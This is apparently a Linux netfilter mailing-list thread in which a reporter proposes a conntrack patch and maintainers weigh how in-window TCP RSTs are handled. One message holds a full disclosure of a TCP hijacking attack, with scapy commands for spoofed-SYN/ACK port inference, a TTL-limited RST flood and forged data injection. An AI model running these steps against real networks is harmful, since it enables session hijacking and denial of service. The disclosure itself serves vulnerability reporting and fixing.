Message ID | 20240705040013.29860-1-979093444@qq.com |
---|---|
State | Under Review |
Headers | show |
Series | netfilter: conntrack: tcp: do not lower timeout to CLOSE for in-window RSTs | expand |
yyxRoy <yyxroy22@gmail.com> wrote: > With previous commit https://github.com/torvalds/linux/commit/be0502a > ("netfilter: conntrack: tcp: only close if RST matches exact sequence") > to fight against TCP in-window reset attacks, current version of netfilter > will keep the connection state in ESTABLISHED, but lower the timeout to > that of CLOSE (10 seconds by default) for in-window TCP RSTs, and wait for > the peer to send a challenge ack to restore the connection timeout > (5 mins in tests). > > However, malicious attackers can prevent incurring challenge ACKs by > manipulating the TTL value of RSTs. The attacker can probe the TTL value > between the NAT device and itself and send in-window RST packets with > a TTL value to be decreased to 0 after arriving at the NAT device. > This causes the packet to be dropped rather than forwarded to the > internal client, thus preventing a challenge ACK from being triggered. > As the window of the sequence number is quite large (bigger than 60,000 > in tests) and the sequence number is 16-bit, the attacker only needs to > send nearly 60,000 RST packets with different sequence numbers > (i.e., 1, 60001, 120001, and so on) and one of them will definitely > fall within in the window. > > Therefore we can't simply lower the connection timeout to 10 seconds > (rather short) upon receiving in-window RSTs. With this patch, netfilter > will lower the connection timeout to that of CLOSE only when it receives > RSTs with exact sequence numbers (i.e., old_state != new_state). This effectively ignores most RST packets, which will clog up the conntrack table (established timeout is 5 days). I don't think there is anything sensible that we can do here. Also, one can send train with data packet + rst and we will hit the immediate close conditional: /* Check if rst is part of train, such as * foo:80 > bar:4379: P, 235946583:235946602(19) ack 42 * foo:80 > bar:4379: R, 235946602:235946602(0) ack 42 */ if (ct->proto.tcp.last_index == TCP_ACK_SET && ct->proto.tcp.last_dir == dir && seq == ct->proto.tcp.last_end) break; So even if we'd make this change it doesn't prevent remote induced resets. Conntrack cannot validate RSTs precisely due to lack of information, only the endpoints can do this.
On Fri, 5 Jul 2024, Florian Westphal wrote: > yyxRoy <yyxroy22@gmail.com> wrote: > > With previous commit https://github.com/torvalds/linux/commit/be0502a > > ("netfilter: conntrack: tcp: only close if RST matches exact sequence") > > to fight against TCP in-window reset attacks, current version of netfilter > > will keep the connection state in ESTABLISHED, but lower the timeout to > > that of CLOSE (10 seconds by default) for in-window TCP RSTs, and wait for > > the peer to send a challenge ack to restore the connection timeout > > (5 mins in tests). > > > > However, malicious attackers can prevent incurring challenge ACKs by > > manipulating the TTL value of RSTs. The attacker can probe the TTL value > > between the NAT device and itself and send in-window RST packets with > > a TTL value to be decreased to 0 after arriving at the NAT device. > > This causes the packet to be dropped rather than forwarded to the > > internal client, thus preventing a challenge ACK from being triggered. > > As the window of the sequence number is quite large (bigger than 60,000 > > in tests) and the sequence number is 16-bit, the attacker only needs to > > send nearly 60,000 RST packets with different sequence numbers > > (i.e., 1, 60001, 120001, and so on) and one of them will definitely > > fall within in the window. > > > > Therefore we can't simply lower the connection timeout to 10 seconds > > (rather short) upon receiving in-window RSTs. With this patch, netfilter > > will lower the connection timeout to that of CLOSE only when it receives > > RSTs with exact sequence numbers (i.e., old_state != new_state). > > This effectively ignores most RST packets, which will clog up the > conntrack table (established timeout is 5 days). > > I don't think there is anything sensible that we can do here. > > Also, one can send train with data packet + rst and we will hit > the immediate close conditional: > > /* Check if rst is part of train, such as > * foo:80 > bar:4379: P, 235946583:235946602(19) ack 42 > * foo:80 > bar:4379: R, 235946602:235946602(0) ack 42 > */ > if (ct->proto.tcp.last_index == TCP_ACK_SET && > ct->proto.tcp.last_dir == dir && > seq == ct->proto.tcp.last_end) > break; > > So even if we'd make this change it doesn't prevent remote induced > resets. > > Conntrack cannot validate RSTs precisely due to lack of information, > only the endpoints can do this. I fully agree with Florian: conntrack plays the role of a middle box and cannot absolutely know the right seq/ack numbers of the client/server sides. Add NAT on top of that and there are a couple of ways to attack a given traffic. I don't see a way by which the checkings/parameters could be tightened without blocking real traffic. Best regards, Jozsef
Jozsef Kadlecsik <kadlec@blackhole.kfki.hu> wrote: > I fully agree with Florian: conntrack plays the role of a middle box and > cannot absolutely know the right seq/ack numbers of the client/server > sides. Add NAT on top of that and there are a couple of ways to attack a > given traffic. I don't see a way by which the checkings/parameters could > be tightened without blocking real traffic. I forgot about TCP timestamps, which we do not track at the moment. But then there is a slight caveat: if one side exits, RST won't carry timestamp option, so even keeping track of timestamps will help :-(
On Fri, 5 Jul 2024 at 17:43, Florian Westphal <fw@strlen.de> wrote: > Also, one can send train with data packet + rst and we will hit > the immediate close conditional: > > /* Check if rst is part of train, such as > * foo:80 > bar:4379: P, 235946583:235946602(19) ack 42 > * foo:80 > bar:4379: R, 235946602:235946602(0) ack 42 > */ > if (ct->proto.tcp.last_index == TCP_ACK_SET && > ct->proto.tcp.last_dir == dir && > seq == ct->proto.tcp.last_end) > break; > > So even if we'd make this change it doesn't prevent remote induced > resets. Thank you for your time and prompt reply and for bringing to my attention the case I had overlooked. I acknowledge that as a middlebox, Netfilter faces significant challenges in accurately determining the correct sequence and acknowledgment numbers. However, it is crucial to consider the security implications as well. For instance, previously, an in-window RST could switch the mapping to the CLOSE state with a mere 10-second timeout. The recent patch, (netfilter: conntrack: tcp: only close if RST matches exact sequence), has aimed to improve security by keeping the mapping in the established state and extending the timeout to 300 seconds upon receiving a Challenge ACK. However, this patch's efforts are still insufficient to completely prevent attacks. As I mentioned, attackers can manipulate the TTL to prevent the peer from responding to the Challenge ACK, thereby reverting the mapping to the 10-second timeout. This duration is quite short and potentially dangerous, leading to various attacks, including TCP hijacking (I have included a detailed report on potential attacks if time permits). else if (unlikely(index == TCP_RST_SET)) timeout = timeouts[TCP_CONNTRACK_CLOSE]; The problem is that current netfilter only checks if the packet has the RST flag (index == TCP_RST_SET) and lowers the timeout to that of CLOSE (10 seconds only). I strongly recommend implementing measures to prevent such vulnerabilities. For example, in the case of an in-window RST, could we consider lowering the timeout to 300 seconds or else? Thank you for considering these points. Once again, thank you for your time and efforts in enhancing community security and usability. Best regards, Yuxiang **************************************************************************************************************************************************************************************************** Here is a case study illustrating how a 10-second timeout can lead to a TCP hijacking attack for you if you are interested. I hope it won't waste your time and effort. Additionally, I hope the plain text format will clearly explain the situation. **General Disclosure: Linux Netfilter’s Vulnerability of Lacking Sufficient TCP Sequence Number Validation 1. Threat model Figure 1 shows the threat model of the TCP hijacking attack. The victim client behind Linux with Netfilter enabled connect to the remote victim server using TCP to access online services. There will be a malicious inside attacker in the same LAN such as in the Wi-Fi or VPN NAT scenarios. The attacker can also control a machine with the ability of IP spoofing on the Internet. The malicious attacker in the LAN can hijack the TCP session between another client and the remote server, thereby terminating the original TCP connection or injecting forged messages into the connection, which may lead to denial of service attacks or privacy leakage attacks. victim-client remote-server \ / \ / \ / ----------NAT device with Netfilter ---------- / \ / \ / \ local-attacker IP-spoofable-machine (controlled by the attacker) Fig 1. Threat model of the TCP hijacking attack. 2. Experiment Setup We will take VPN scenarios as the example cases in the disclosure. We create a test environment as shown in Fig.2. The machines are all equiped with Ubuntu 22.04 running the Linux kernel. We configured the NAT device as the VPN server with OpenVPN. And the client and attacker are connecting to it with OpenVPN. The victim client establishes a TCP connection with the remote server (such as SSH connections or accessing web pages). Here we take a simple TCP connection as an example in which the client and server run the netcat program to establish a connection as follows. vpn-client (tun0:10.8.0.3) remote-server (eth0:43.159.39.110) \ / \ / \ / ---- (tun0:10.8.0.1) vpn server (eth0:43.163.229.240)--- / \ / \ / \ local-attacker (tun0:10.8.0.2) IP-spoofable-machine (controlled by the attacker) Fig 2. Testing environment. The server starts the netcat service and listens to port 80. ------------------ remote-server@remote-server:~$sudo nc -l -p 80 hello,i'm client HELLO,I'M SERVER ------------------ The victim establishes a TCP connection with the source port 40000 ------------------ victim-client@victim-client:~$nc 43.159.39.110 80 -p 40000 hello,i'm client HELL0,I'M SERVER ------------------ There will be a corresponding NAT mapping recoreded by Netfilter as follows: ------------------ VPN-server@VPN-server:~$sudo conntrack -L | grep 43.159.39.110 tcp 6431973 ESTABLISHED src=10.8.0.3 dst=43.159.39.110 sport=40000 dport=80 src=43.159.39.110 dst=10.203.0.5 sport=80 dport=40000 [ASSURED] mark=0 use=1 ------------------ 3.Attack Steps 3.1 In the first step, the attacker infers the TCP source port used by the victim. (1) The attacker constructs a SYN packet from itself to the server with a guessed source port m. In most cases, the attacker cannot guess the right source port. For example, m is 50000. ------------------ local-attacker@local-attacker:~$ sudo scapy >>>send(IP(src="10.8.0.2",dst=43.159.39.110",ttl=2)/TCP(seq=1,ack=1,sport=50000,dport=80,flags="S"),iface="tun0") ------------------ Netfilter will create a new NAT mapping to record the session as followed: ------------------ VPN-server@VPN-server:~$sudo conntrack -L | grep 43.159.39.110 tcp 6 431841 ESTABLISHED src=10.8.0.3 dst=43.159.39.110 sport=40000 dport=80 src=43.159.39.110 dst=10.203.0.5 sport=80 dport=40000 [ASSURED]mark=0 use=1 tcp 6 115 SYN_SENT src=10.8.0.2 dst=43.159.39.110 sport=50000 dport=80 [UNREPLIED] src=43.159.39.110 dst=10.203.0.5 sport=80 dport=50000 mark=0 use=1 ------------------ Then the attacker can controlled its spoof machine to send a spoofed SYN/ACK packet as the server to the NAT device’s external IP address with the guessed port to verify it. ------------------ spoofable-machine@spoofable-machine:~$ sudo scapy >>>send(IP(src="43.159.39.110",dst="43.163.229.240")/TCP(seq=1,ack=1,sport=80,dport=50000,flags="SA")) ------------------ In this case, the SYN/ACK packet will match the attacker’s mapping and be forwarded to the attacker as it matches the second NAT mapping. local-attacker@local-attacker:~$ sudo tcpdump -i any -nSvvv host 43.159.39.110 16:20:31.073779 tun0 Out IP (tos 0x0, ttl 2, id 1, offset 0, flags [none], proto TCP (6), length 40) 10.8.0.2.50000 > 43.159.39.110.80:Flags [S], cksum Ox6f29(correct),seq 1, win 8192, length 0 16:22:11.608374 tun0 In IP (tos 0x64, ttl 54, id 1, offset 0, flags [none], proto TCP (6), length 40) 43.159.39.110.80 > 10.8.0.2.50000:Flags [S.], cksum 0x6f19(correct),seq 1, ack 1, win 8192, length 0 ------------------ (2) However, when the attacker guesses the right source port (i.e., 40000) to send the SYN packet. ------------------ local-attacker@local-attacker:~$ sudo scapy >>>send(IP(src="10.8.0.2",dst=43.159.39.110",ttl=2)/TCP(seq=1,ack=1,sport=40000,dport=80,flags="S"),iface="tun0") ------------------ Netfilter will translate it to another random source port to deal with port collision. For example, it chooses 63503 and the NAT mapping is as followed. ------------------ VPN-server@VPN-server:~$sudo conntrack -L | grep 43.159.39.110 tcp 6 431841 ESTABLISHED src=10.8.0.3 dst=43.159.39.110 sport=40000 dport=80 src=43.159.39.110 dst=10.203.0.5 sport=80 dport=40000 [ASSURED]mark=0 use=1 tcp 6 114 SYN_SENT src=10.8.0.2 dst=43.159.39.110 sport=40000 dport=80 [UNREPLIED] src=43.159.39.110 dst=10.203.0.5 sport=80 dport=63503 mark=0 use=1 ------------------ Then the attacker controls its spoof machine to send the verified SYN/ACK packet with guessed port 40000. ------------------ spoofable-machine@spoofable-machine:~$ sudo scapy >>>send(IP(src="43.159.39.110",dst="43.163.229.240")/TCP(seq=1,ack=1,sport=80,dport=40000,flags="SA")) ------------------ However, this time it will be forwarded to the victim client instead of the attacker as it will match the first NAT mapping Finally, the attacker can find the source port used by the victim device by traversing the entire possible space of the source ports through the above-mentioned difference between guessing the source port correctly/wrongly, that is, whether it can receive the spoofed SYN/ACK packet. 3.2 In the second step, the attacker intercepts the message of the victim's current TCP connection to obtain the accurate sequence number and acknowledge number. (1) Since current version of Netfilter does not check the sequence number strictly, an RST packet with an in-window sequence number can cause the change of the mapping state. With previous patch (https://github.com/torvalds/linux/commit/be0502a3f2e94211a8809a09ecbc3a017189b8fb) to fight against blind TCP reset attacks, instead of directly transferring the state of the NAT mapping to CLOSE with a 10-second timeout, the state will keep in the state of ESTABLISHED, but the timeout will still be decreased to 10 seconds. As the in-window RST will trigger the endpoint to respond with a Challenge ACK packet back, the timeout of the mapping will be updated to 300 seconds. However, we find that the update of the timeout can be bypassed by the malicious attacker. The attacker can probe the TTL value between the NAT device and the spoof machine and send an in-window RST packet with a TTL value to be decreased to 0 after arriving at the NAT device, thus it will be dropped rather than forwarded to the victim client and no Challenge ACK will be triggered. Besides, as the window of the sequence number is quite large (bigger than 60,000 in our test) and the sequence number is 16-bit, the attacker only needs to send nearly 60,000 RST packets with different sequence numbers (i.e., 1, 60001, 120001, and so on) and one of them will definitely locate in the window. ------------------ spoofable-machine@spoofable-machine:~$ sudo scapy >>>send(IP(src="43.159.39.110",dst="43.163.229.240",ttl=10)/TCP(seq=1319804841+60000,ack=1,sport=80,dport=40000,flags="R")) ------------------ It only takes a rather short time (nearly 1-2 seconds) for current machines to send 60,000 RST packets. In this way, the NAT mapping will be quickly cleaned after the RST packets. ------------------ VPN-server@VPN-server:~$sudo conntrack -L | grep 43.159.39.110 tcp 6 431841 ESTABLISHED src=10.8.0.3 dst=43.159.39.110 sport=40000 dport=80 src=43.159.39.110 dst=10.203.0.5 sport=80 dport=40000 [ASSURED]mark=0 use=1 VPN-server@VPN-server:~$#####After RST VPN-server@VPN-server:~$sudo conntrack -L | grep 43.159.39.110 tcp 6 10 ESTABLISHED src=10.8.0.3 dst=43.159.39.110 sport=40000 dport=80 src=43.159.39.110 dst=10.203.0.5 sport=80 dport=40000 [ASSURED]mark=0 use=1 VPN-server@VPN-server:~$#####After 10 seconds VPN-server@VPN-server:~$sudo conntrack -L | grep 43.159.39.110 tcp 6 0 ESTABLISHED src=10.8.0.3 dst=43.159.39.110 sport=40000 dport=80 src=43.159.39.110 dst=10.203.0.5 sport=80 dport=40000 [ASSURED]mark=0 use=1 VPN-server@VPN-server:~$#####After that VPN-server@VPN-server:~$sudo conntrack -L | grep 43.159.39.110 ------------------ (2) After the NAT mapping disappears, the attacker constructs a TCP data packet to the server. After NAT, it seems the same as those sent from the victim client. The server will respond an ACK packet back to the attacker, which contains the correct sequence and acknowledge numbers as shown below: ------------------ local-attacker@local-attacker:~$ sudo scapy >>>send(IP(src="10.8.0.2",dst=43.159.39.110")/TCP(seq=1,ack=1,sport=40000,dport=80,flags="PA"),iface="tun0") local-attacker@local-attacker:~$ sudo tcpdump -i any -nSvvv host 43.159.39.110 16:44:21.141636 tun0 Out IP (tos Ox0, ttl 64, id 1, offset 0, flags [none], proto TCP (6), length 40) 10.8.0.2.40000 > 43.159.39.110.80: Flags [P.], cksum 0x9623 (correct), seq 1, ack 1, win 8192, length 0 16:44:21.255077 tun0 In IP (tos 0x64, ttl 54, id 20259, offset 0, flags [DF], proto TCP (6), length 52) 43.159.39.110.80 >10.8.0.2.40000: Flags [.],cksum Ox651c (correct), seq 1319804847, ack 684909974, win 509, options[nop,nop,TS val 1722395496 ecr 995347412], length 0 ------------------ 3.3 In the third step, the attacker can use the obtained source port, sequence number, acknowledge number, etc. to choose to send an RST packet to terminate the original TCP connection (such as SSH service, etc.), inject fake messages into the original TCP connection to manipulate the sessions (such as Web HTTP pages, etc.), or send requests to the server. ------------------ local-attacker@local-attacker:~$ sudo scapy >>>send(IP(src="10.8.0.2",dst=43.159.39.110")/TCP(seq=684909974,ack=1319804847,sport=40000,dport=80,flags="PA")/"You are hijacked, send me money",iface="tun0") ------------------ On the server machine, the spoofed messages will be accepted as the sequence and acknowledgment numbers are right. ------------------ remote-server@remote-server:~$sudo nc -l -p 80 hello,i'm client HELLO,I'M SERVER You are hijacked, send me money ------------------------------
yyxRoy <yyxroy22@gmail.com> wrote: > On Fri, 5 Jul 2024 at 17:43, Florian Westphal <fw@strlen.de> wrote: > > Also, one can send train with data packet + rst and we will hit > > the immediate close conditional: > > > > /* Check if rst is part of train, such as > > * foo:80 > bar:4379: P, 235946583:235946602(19) ack 42 > > * foo:80 > bar:4379: R, 235946602:235946602(0) ack 42 > > */ > > if (ct->proto.tcp.last_index == TCP_ACK_SET && > > ct->proto.tcp.last_dir == dir && > > seq == ct->proto.tcp.last_end) > > break; > > > > So even if we'd make this change it doesn't prevent remote induced > > resets. > > Thank you for your time and prompt reply and for bringing to my attention the case > I had overlooked. I acknowledge that as a middlebox, Netfilter faces significant > challenges in accurately determining the correct sequence and acknowledgment > numbers. However, it is crucial to consider the security implications as well. Yes, but we have to make do with the information we have (or we can observe) and we have to trade this vs. occupancy of the conntrack table. > For instance, previously, an in-window RST could switch the mapping to the > CLOSE state with a mere 10-second timeout. The recent patch, > (netfilter: conntrack: tcp: only close if RST matches exact sequence), > has aimed to improve security by keeping the mapping in the established state > and extending the timeout to 300 seconds upon receiving a Challenge ACK. be0502a3f2e9 ("netfilter: conntrack: tcp: only close if RST matches exact sequence")? Yes, that is a side effect. It was about preventing nat mapping from going away because of RST packet coming from an unrelated previous connection (Carrier-Grade NAT makes this more likely, unfortunately). I don't know how to prevent it for RST flooding with known address/port pairs. > However, this patch's efforts are still insufficient to completely prevent attacks. > As I mentioned, attackers can manipulate the TTL to prevent the peer from > responding to the Challenge ACK, thereby reverting the mapping to the > 10-second timeout. This duration is quite short and potentially dangerous, > leading to various attacks, including TCP hijacking (I have included a detailed > report on potential attacks if time permits). > else if (unlikely(index == TCP_RST_SET)) > timeout = timeouts[TCP_CONNTRACK_CLOSE]; > > The problem is that current netfilter only checks if the packet has the RST flag > (index == TCP_RST_SET) and lowers the timeout to that of CLOSE (10 seconds only). > I strongly recommend implementing measures to prevent such vulnerabilities. I don't know how. We can track TTL/NH. We can track TCP timestamps. But how would we use such extra information? E.g. what I we observe: ACK, TTL 32 ACK, TTL 31 ACK, TTL 30 ACK, TTL 29 ... will we just refuse to update TTL? If we reduce it, any attacker can shrink it to needed low value to prevent later RST from reaching end host. If we don't, connection could get stuck on legit route change? What about malicious entities injecting FIN/SYN packets rather than RST? If we have last ts.echo from remote side, we can make it harder, but what do if RST doesn't carry timestamp? Could be perfectly legal when machine lost state, e.g. power-cycled. So we can't ignore such RSTs. > For example, in the case of an in-window RST, could we consider lowering > the timeout to 300 seconds or else? Yes, but I don't see how it helps. Attacker can prepend data packet and we'd still move to close. And I don't really want to change that because it helps to get rid of stale connection with real/normal traffic. I'm worried that adding cases where we do not act on RSTs will cause conntrack table to fill up.
On Mon, 8 Jul 2024 at 22:12, Florian Westphal <fw@strlen.de> wrote: > We can track TTL/NH. > We can track TCP timestamps. > > But how would we use such extra information? > E.g. what I we observe: > > ACK, TTL 32 > ACK, TTL 31 > ACK, TTL 30 > ACK, TTL 29 > > ... will we just refuse to update TTL? > If we reduce it, any attacker can shrink it to needed low value > to prevent later RST from reaching end host. > > If we don't, connection could get stuck on legit route change? > What about malicious entities injecting FIN/SYN packets rather than RST? > > If we have last ts.echo from remote side, we can make it harder, but > what do if RST doesn't carry timestamp? > > Could be perfectly legal when machine lost state, e.g. power-cycled. > So we can't ignore such RSTs. I fully agree with your considerations. There are indeed some challenges with the proposed methods of enhancing checks on RSTs of in-window sequence numbers, TTL, and timestamps. However, we now have known that conntrack may be vulnerable to attacks and illegal state transitions when it receives in-window RSTs with incorrect TTL or data packets + RSTs. Is it possible to find better methods to mitigate these issues, as they may pose threats to Netfilter users? Note: We have also tested other connection tracking frameworks (such as FreeBSD/OpenBSD PF). Also playing the roles as middleboxes, they only change the state of the connection when they receive an RST with the currently known precise sequence number, thus avoiding these attacks. Could Netfilter adopt similar measures or else to further mitigate these issues? Thank you again for your time and for your efforts in maintaining the community's performance and security!
Hi, On Wed, 10 Jul 2024, yyxRoy wrote: > On Mon, 8 Jul 2024 at 22:12, Florian Westphal <fw@strlen.de> wrote: >> We can track TTL/NH. >> We can track TCP timestamps. >> >> But how would we use such extra information? >> E.g. what I we observe: >> >> ACK, TTL 32 >> ACK, TTL 31 >> ACK, TTL 30 >> ACK, TTL 29 >> >> ... will we just refuse to update TTL? >> If we reduce it, any attacker can shrink it to needed low value >> to prevent later RST from reaching end host. >> >> If we don't, connection could get stuck on legit route change? >> What about malicious entities injecting FIN/SYN packets rather than RST? >> >> If we have last ts.echo from remote side, we can make it harder, but >> what do if RST doesn't carry timestamp? >> >> Could be perfectly legal when machine lost state, e.g. power-cycled. >> So we can't ignore such RSTs. > > I fully agree with your considerations. There are indeed some challenges > with the proposed methods of enhancing checks on RSTs of in-window > sequence numbers, TTL, and timestamps. Your original suggestion was "Verify the sequence numbers of TCP packets strictly and do not change the timeout of the NAT mapping for an in-window RST packet." Please note, you should demonstrate that such a mitigation - does not prevent (from conntrack point of view) currently handled/properly closed traffic to be handled with the mitigation as well - the mitigation actually does not pose an easier exhaustion of the conntrack table, i.e. creating an easier DoS vulnerability against it. > However, we now have known that conntrack may be vulnerable to attacks > and illegal state transitions when it receives in-window RSTs with > incorrect TTL or data packets + RSTs. Is it possible to find better > methods to mitigate these issues, as they may pose threats to Netfilter > users? The attack requires exhaustive port scanning. That can be prevented with proper firewall rules. > Note: We have also tested other connection tracking frameworks (such as > FreeBSD/OpenBSD PF). Also playing the roles as middleboxes, they only > change the state of the connection when they receive an RST with the > currently known precise sequence number, thus avoiding these attacks. > Could Netfilter adopt similar measures or else to further mitigate these > issues? I find it really strange that those frameworks would match only the exact SEQ of the RST packets. Best regards, Jozsef
diff --git a/net/netfilter/nf_conntrack_proto_tcp.c b/net/netfilter/nf_conntrack_proto_tcp.c index ae493599a..d06259407 100644 --- a/net/netfilter/nf_conntrack_proto_tcp.c +++ b/net/netfilter/nf_conntrack_proto_tcp.c @@ -1280,7 +1280,8 @@ int nf_conntrack_tcp_packet(struct nf_conn *ct, if (ct->proto.tcp.retrans >= tn->tcp_max_retrans && timeouts[new_state] > timeouts[TCP_CONNTRACK_RETRANS]) timeout = timeouts[TCP_CONNTRACK_RETRANS]; - else if (unlikely(index == TCP_RST_SET)) + else if (unlikely(index == TCP_RST_SET) && + old_state != new_state) timeout = timeouts[TCP_CONNTRACK_CLOSE]; else if ((ct->proto.tcp.seen[0].flags | ct->proto.tcp.seen[1].flags) & IP_CT_TCP_FLAG_DATA_UNACKNOWLEDGED &&
With previous commit https://github.com/torvalds/linux/commit/be0502a ("netfilter: conntrack: tcp: only close if RST matches exact sequence") to fight against TCP in-window reset attacks, current version of netfilter will keep the connection state in ESTABLISHED, but lower the timeout to that of CLOSE (10 seconds by default) for in-window TCP RSTs, and wait for the peer to send a challenge ack to restore the connection timeout (5 mins in tests). However, malicious attackers can prevent incurring challenge ACKs by manipulating the TTL value of RSTs. The attacker can probe the TTL value between the NAT device and itself and send in-window RST packets with a TTL value to be decreased to 0 after arriving at the NAT device. This causes the packet to be dropped rather than forwarded to the internal client, thus preventing a challenge ACK from being triggered. As the window of the sequence number is quite large (bigger than 60,000 in tests) and the sequence number is 16-bit, the attacker only needs to send nearly 60,000 RST packets with different sequence numbers (i.e., 1, 60001, 120001, and so on) and one of them will definitely fall within in the window. Therefore we can't simply lower the connection timeout to 10 seconds (rather short) upon receiving in-window RSTs. With this patch, netfilter will lower the connection timeout to that of CLOSE only when it receives RSTs with exact sequence numbers (i.e., old_state != new_state). Signed-off-by: yyxRoy <979093444@qq.com> --- net/netfilter/nf_conntrack_proto_tcp.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-)